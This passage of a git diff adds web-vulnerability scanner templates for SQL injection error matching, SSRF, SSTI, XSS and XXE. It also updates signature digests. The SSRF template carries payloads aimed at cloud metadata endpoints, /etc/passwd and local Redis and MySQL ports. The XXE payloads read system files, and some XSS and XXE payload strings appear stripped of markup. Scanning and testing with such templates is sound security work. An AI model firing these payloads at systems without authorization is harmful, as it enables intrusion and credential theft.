- "{{injection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Adminer" + negative: true + # False Positive + + - type: regex + regex: + # MySQL + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE\\[\\d+\\]: Syntax error or access violation" + # MariaDB + - "check the manual that (corresponds to|fits) your MariaDB server version" + # Drizzle + - "check the manual that (corresponds to|fits) your Drizzle server version" + # MemSQL + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + # PostgreSQL + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + # Microsoft SQL Server + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + # Microsoft Access + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + # Oracle + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + # IBM DB2 + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + # Informix + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + # Firebird + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + # SQLite + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + # SAP MaxDB + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + # Sybase + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + # Ingres + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + # FrontBase + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error [1-4]\\d{2}\\." + # HSQLDB + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + # H2 + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + # MonetDB + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + # Apache Derby + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + # Vertica + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + # Mckoi + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + # Presto + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + # Altibase + - "Altibase\\.jdbc\\.driver" + # MimerSQL + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + # CrateDB + - "io\\.crate\\.client\\.jdbc" + # Cache + - "encountered after end of query" + - "A comparison operator is required here" + # Raima Database Manager + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + # Virtuoso + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" + condition: or + + extractors: + - type: regex + name: mysql + regex: + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE[\\d+]: Syntax error or access violation" + + - type: regex + name: mariadb + regex: + - "check the manual that (corresponds to|fits) your MariaDB server version" + + - type: regex + name: drizzel + regex: + - "check the manual that (corresponds to|fits) your Drizzle server version" + + - type: regex + name: memsql + regex: + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + + - type: regex + name: postgresql + regex: + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + + - type: regex + name: microsoftsqlserver + regex: + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + + - type: regex + name: microsoftaccess + regex: + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + + - type: regex + name: oracle + regex: + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + + - type: regex + name: ibmdb2 + regex: + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + + - type: regex + name: informix + regex: + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + + - type: regex + name: firebird + regex: + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + + - type: regex + name: sqlite + regex: + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + + - type: regex + name: sapmaxdb + regex: + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + + - type: regex + name: sybase + regex: + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + + - type: regex + name: ingres + regex: + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + + - type: regex + name: frontbase + regex: + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." + + - type: regex + name: hsqldb + regex: + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + + - type: regex + name: h2 + regex: + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + + - type: regex + name: monetdb + regex: + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + + - type: regex + name: apachederby + regex: + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + + - type: regex + name: vertica + regex: + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + + - type: regex + name: mckoi + regex: + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + + - type: regex + name: presto + regex: + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + + - type: regex + name: altibase + regex: + - "Altibase\\.jdbc\\.driver" + + - type: regex + name: mimersql + regex: + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + + - type: regex + name: cratedb + regex: + - "io\\.crate\\.client\\.jdbc" + + - type: regex + name: cache + regex: + - "encountered after end of query" + - "A comparison operator is required here" + + - type: regex + name: raimadatabasemanager + regex: + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + + - type: regex + name: virtuoso + regex: + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" +# digest: 4a0a00473045022100991ee3aa73500a4773ffbc23f50ab000999d53da3f5ab8723a4abc146eba69ee02207ef58106e21c140b29dfabac8270bbe11bd86b7b14f51b785f437e20d1f124de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/ssrf/blind-ssrf.yaml b/dast/vulnerabilities/ssrf/blind-ssrf.yaml new file mode 100644 index 0000000000..2c4d20d9e0 --- /dev/null +++ b/dast/vulnerabilities/ssrf/blind-ssrf.yaml @@ -0,0 +1,42 @@ +id: blind-ssrf + +info: + name: Blind SSRF OAST Detection + author: pdteam + severity: medium + tags: ssrf,dast,oast + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + ssrf: + - "{{interactsh-url}}" + - "{{FQDN}}.{{interactsh-url}}" + - "{{RDN}}.{{interactsh-url}}" + + fuzzing: + - part: query + mode: single + values: + - "https?://" # Replace HTTP URLs with alternatives + fuzz: + - "https://{{ssrf}}" + + - part: query + mode: single + values: + - "^[A-Za-z0-9-._]+:[0-9]+$" # Replace : with alternative + fuzz: + - "{{ssrf}}:80" + + stop-at-first-match: true + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" +# digest: 4a0a004730450221008e67c53d4368607db787a520c50ce1ae8c742483ea80c0e7d34ab8ef529d2c9902205c049079f166eae9a8e5c5c99b72a048bebaa05de3eb3828adb9d81fab3543aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/ssrf/response-ssrf.yaml b/dast/vulnerabilities/ssrf/response-ssrf.yaml new file mode 100644 index 0000000000..14f81d9668 --- /dev/null +++ b/dast/vulnerabilities/ssrf/response-ssrf.yaml @@ -0,0 +1,129 @@ +id: response-ssrf + +info: + name: Full Response SSRF Detection + author: pdteam,pwnhxl,j4vaovo + severity: high + reference: + - https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py + tags: ssrf,dast + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + ssrf: + - 'http://{{interactsh-url}}' + - 'http://{{FQDN}}.{{interactsh-url}}' + - 'http://{{RDN}}.{{interactsh-url}}' + - 'file:////./etc/./passwd' + - 'file:///c:/./windows/./win.ini' + - 'http://metadata.tencentyun.com/latest/meta-data/' + - 'http://100.100.100.200/latest/meta-data/' + - 'http://169.254.169.254/latest/meta-data/' + - 'http://169.254.169.254/metadata/v1' + - 'http://127.0.0.1:22' + - 'http://127.0.0.1:3306' + - 'dict://127.0.0.1:6379/info' + + fuzzing: + - part: query + mode: single + keys: + - callback + - continue + - data + - dest + - dir + - domain + - feed + - file + - host + - html + - imgurl + - navigation + - next + - open + - out + - page + - path + - port + - redirect + - reference + - return + - show + - site + - to + - uri + - url + - val + - validate + - view + - window + fuzz: + - "{{ssrf}}" + + - part: query + mode: single + values: + - "(https|http|file)(%3A%2F%2F|://)(.*?)" + fuzz: + - "{{ssrf}}" + + stop-at-first-match: true + matchers-condition: or + matchers: + + - type: word + part: body + words: + - "Interactsh Server" + + - type: regex + part: body + regex: + - 'SSH-(\d.\d)-OpenSSH_(\d.\d)' + + - type: regex + part: body + regex: + - '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)' + + - type: regex + part: body + regex: + - '(\d.\d.\d)(.*?)mysql_native_password' + + - type: regex + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + part: body + words: + - 'for 16-bit app support' + + - type: regex + part: body + regex: + - 'dns-conf\/[\s\S]+instance\/' + + - type: regex + part: body + regex: + - 'app-id[\s\S]+placement\/' + + - type: regex + part: body + regex: + - 'ami-id[\s\S]+placement\/' + + - type: regex + part: body + regex: + - 'id[\s\S]+interfaces\/' +# digest: 4a0a00473045022100f1036d0d83d2d319f244f143873a16f2ae222e1f0d7dfa3a12604bc50547945c022014f428e033f9ac02ba873325301b910fde7ae7fac3613ab0388ea5d9a14e5f56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/ssti/reflection-ssti.yaml b/dast/vulnerabilities/ssti/reflection-ssti.yaml new file mode 100644 index 0000000000..fae9311f3c --- /dev/null +++ b/dast/vulnerabilities/ssti/reflection-ssti.yaml @@ -0,0 +1,53 @@ +id: reflection-ssti + +info: + name: Reflected SSTI Arithmetic Based + author: pdteam + severity: medium + reference: + - https://github.com/zaproxy/zap-extensions/blob/2d9898900abe85a47b9fe0ceb85ec39070816b98/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiScanRule.java + - https://github.com/DiogoMRSilva/websitesVulnerableToSSTI#list-of-seversneeds-update + tags: ssti,dast + +variables: + first: "{{rand_int(1000, 9999)}}" + second: "{{rand_int(1000, 9999)}}" + result: "{{to_number(first)*to_number(second)}}" + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + skip-variables-check: true + payloads: + ssti: + - '{{concat("${", "{{first}}*{{second}}", "}")}}' + - '{{concat("{{", "{{first}}*{{second}}", "}}")}}' + - '{{concat("<%=", "{{first}}*{{second}}", "%>")}}' + - '{{concat("{", "{{first}}*{{second}}", "}")}}' + - '{{concat("{{{", "{{first}}*{{second}}", "}}}")}}' + - '{{concat("${{", "{{first}}*{{second}}", "}}")}}' + - '{{concat("#{", "{{first}}*{{second}}", "}")}}' + - '{{concat("[[", "{{first}}*{{second}}", "]]")}}' + - '{{concat("{{=", "{{first}}*{{second}}", "}}")}}' + - '{{concat("[[${", "{{first}}*{{second}}", "}]]")}}' + - '{{concat("${xyz|", "{{first}}*{{second}}", "}")}}' + - '{{concat("#set($x=", "{{first}}*{{second}}", ")${x}")}}' + - '{{concat("@(", "{{first}}*{{second}}", ")")}}' + - '{{concat("{@", "{{first}}*{{second}}", "}")}}' + + fuzzing: + - part: query + type: postfix + fuzz: + - "{{ssti}}" + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "{{result}}" +# digest: 4a0a00473045022060b24ab805932a9aae5635d76725d92d78d3366f76b103480386f7db2231b750022100cf4e3feff8153a59a9b668bbe6c989c4940074ec6857c5f4f4f920660719143d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/xss/dom-xss.yaml b/dast/vulnerabilities/xss/dom-xss.yaml new file mode 100644 index 0000000000..09394df88e --- /dev/null +++ b/dast/vulnerabilities/xss/dom-xss.yaml @@ -0,0 +1,46 @@ +id: dom-xss + +info: + name: DOM Cross Site Scripting + author: theamanrawat + severity: medium + description: | + Detects DOM-based Cross Site Scripting (XSS) vulnerabilities. + impact: | + Allows attackers to execute malicious scripts in the victim's browser. + remediation: | + Sanitize and validate user input to prevent script injection. + tags: xss,dom,dast,headless +variables: + num: "{{rand_int(10000, 99999)}}" +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}" + + - action: waitload + payloads: + reflection: + - "'\">

{{num}}

" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

{{num}}

" + + - type: word + part: header + words: + - "text/html" +# digest: 490a0046304402207fab7c940fcf22142b9d67138f5ab9f0b23ff7990e1a3140a0e427d5040f331b02200c46ebbb04f1cc22da5644e29a7cf09905491c071ee8a80b2cd1070c6772827b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/xss/reflected-xss.yaml b/dast/vulnerabilities/xss/reflected-xss.yaml new file mode 100644 index 0000000000..bbb658c851 --- /dev/null +++ b/dast/vulnerabilities/xss/reflected-xss.yaml @@ -0,0 +1,41 @@ +id: reflected-xss + +info: + name: Reflected Cross Site Scripting + author: pdteam + severity: medium + tags: xss,rxss,dast + +variables: + first: "{{rand_int(10000, 99999)}}" + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + reflection: + - "'\"><{{first}}" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{reflection}}" + + - type: word + part: header + words: + - "text/html" +# digest: 4a0a0047304502205a9aa38841e7308e5d1bf21526d6ae14c3ea4b5b00def0f0f0b95501c0df237d022100ca9a3145f00b6278b60ccc0cb44b525a7bfcf2f86ead8664c33c0ce345a623ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/xxe/generic-xxe.yaml b/dast/vulnerabilities/xxe/generic-xxe.yaml new file mode 100644 index 0000000000..26635ebaa5 --- /dev/null +++ b/dast/vulnerabilities/xxe/generic-xxe.yaml @@ -0,0 +1,52 @@ +id: generic-xxe + +info: + name: Generic XML external entity (XXE) + author: pwnhxl + severity: medium + reference: + - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py + tags: dast,xxe + +variables: + rletter: "{{rand_base(6,'abc')}}" + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + xxe: + - ' ]>&{{rletter}};' + - ' ]>&{{rletter}};' + + fuzzing: + - part: query + keys-regex: + - "(.*?)xml(.*?)" + fuzz: + - "{{xxe}}" + + - part: query + values: + - "(" + fuzz: + - "{{xxe}}" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: regex + name: linux + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + name: windows + part: body + words: + - 'for 16-bit app support' +# digest: 490a00463044022057ed734a899a6e84282567122e7cbd55d596db47869a9f1079fdda8222765cdd02206129d4a12c906388ae43c37e4048a1913371fc637748eaaefc1356dbae82d139:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dns/soa-detect.yaml b/dns/soa-detect.yaml index f37f21fb6e..d60f3f0921 100644 --- a/dns/soa-detect.yaml +++ b/dns/soa-detect.yaml @@ -81,4 +81,4 @@ dns: name: "edge-cast" words: - "edgecastdns.net" -# digest: 4a0a00473045022052cc795314a697081c68e82277bf2be22ff53410f9a9a69af759ecefcd5b235b022100f94a899ec64709bb1f7d4e648dc091ee40029b754e4cc451882f0ccb68ff4921:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207543d23b674d6f6af33197f11d534a088adecaa546feb4f674e59c3e17435c14022100ac553ae6b8aa7adc877bf3324accc71ae8801972775c0ed2961e076777d0b66c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dns/spf-record-detect.yaml b/dns/spf-record-detect.yaml index 276b48f046..2017500bd8 100644 --- a/dns/spf-record-detect.yaml +++ b/dns/spf-record-detect.yaml @@ -23,4 +23,4 @@ dns: - type: regex regex: - "v=spf1(.+)" -# digest: 4b0a00483046022100ada13ee531e36c1b45b196bafc39386d03ee223d98f9d0c3d3bd6f0609c6101202210099f776bb4a582a65c321385adc3d8fa9ec6f3047e658c38c6da98c89dd82c7c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e0f6a26cc45857637d83de49ed369272f053c612baef9673f5193256fda98135022100ac6d435df18fdcfdbad52417c38d2dcbff9a58cd2217ba3a66a214fa400ec72b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dns/txt-service-detect.yaml b/dns/txt-service-detect.yaml index 055e8cd7f7..031f65f691 100644 --- a/dns/txt-service-detect.yaml +++ b/dns/txt-service-detect.yaml @@ -218,4 +218,4 @@ dns: name: "whimsical" words: - "whimsical" -# digest: 490a00463044022043132b95ad11ec72665418855d60e0d979abbe9957b18f9170981f4f4af22a72022054d2942e7554851cd1f043f99d5e119ff9e8943a635a891927b1897d270383b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b1a2ab86bb10ef6a55eaa2a6ec8a5adc22a05f003de6e5f6ef884921c4a66e12022054a8c73bec1723fa0637e65cf405f5a5091f6f257d743962dca0691ac639ce2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/xss/dom-xss.yaml b/file/xss/dom-invader-xss.yaml similarity index 92% rename from file/xss/dom-xss.yaml rename to file/xss/dom-invader-xss.yaml index b720bd8f88..43535e5d73 100644 --- a/file/xss/dom-xss.yaml +++ b/file/xss/dom-invader-xss.yaml @@ -1,4 +1,4 @@ -id: dom-xss +id: dom-invader-xss info: name: DOM Invader - Cross-Site Scripting @@ -50,5 +50,4 @@ file: - 'location(\.href|\.hash|\.search|\.pathname)?' - 'window\.name' - 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)' - -# digest: 4a0a004730450220156c7817e33c48d906821587c273a5b1ecd3ed8996c0616e7468f27a46d04aec022100893e4c2dce9b2668a6643dd2fbe05f4a536c3b2df1e7223d971503333da4fb7f:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207cb01583d1a2752ecf4e9fc678dfecec46dfa254251612555d2126e63fc7c7e002202b4d56e018e4837351900cabe41fbb26d0f23c13bfbf5387f8e2161fff66ba60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/headless/cves/2018/CVE-2018-25031.yaml b/headless/cves/2018/CVE-2018-25031.yaml index 9d85abfdd2..d842083a34 100644 --- a/headless/cves/2018/CVE-2018-25031.yaml +++ b/headless/cves/2018/CVE-2018-25031.yaml @@ -70,4 +70,4 @@ headless: words: - "swagger" case-insensitive: true -# digest: 490a004630440220276c4920b8b15fde2802ab2d829106243bfa1d1b5eec02e3ea13925bb1a2367f022012c9b9cb6e5b2906f68da10c6d0aa5c7462f847f906fc82ae576ac26db37fbbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008c5bb8afdc142dbf782c9bb579a7ed08079c67387a1285aaa34a20bd5f67a8e9022100905594915fd641bd07174ef818dd215bc18bc32845731f1aeb85ca745c8612e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index d4d3dd2dfc..1017ec6d7c 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207a313d7af0bc61b06a7aad51917107f695550ad08a26e2a14f08c21800e83d750221009d18bf0ba9ffe17a4ed9d2dfcf6469d2a043290dc3176391f4382ac302fab0de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f18bd6804b42bce98cc02cea3261854e17f9d58bcb7034e2dc7289c456c57c0d022100d91840b613c0b2544a15e2ae802e176fea630dee4788fe64c5e40f9082bc1374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index 1427f20da9..57d6042605 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f500597dac602cf617f29345b26e201c4d927ac567ff15851e270cca11ea1272022100890d6111631f224e22f99c1eb4ba645f25661a55ad8ca32ad947435cf6dfbc03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201530427f983f1ac47d92a3e00fb141fab33efd4f9ac109b29beca3488669ca5b022100e7ab1cc3fec5da235092a57848d0f83403d81bff12d5ed347ee7d6442b19444c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index 809de4301a..6ec05272ec 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202bfa4d60c826a7ee4d2a099739649fe1a6f400138d8e83e4df629f9f019ef50702202d86756c4a21bf6ff7b1eabb8737b621c568040838835ad7cfca57a8191ebd4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009dd2f6f1f47f6884512787786f2340268b3b43d1f115d5b41a670c3f29f42c4d022100dd3b55ba93d169763824f63a0016a520e29f80044dd7087a2d1122f4b3617c19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2004/CVE-2004-1965.yaml 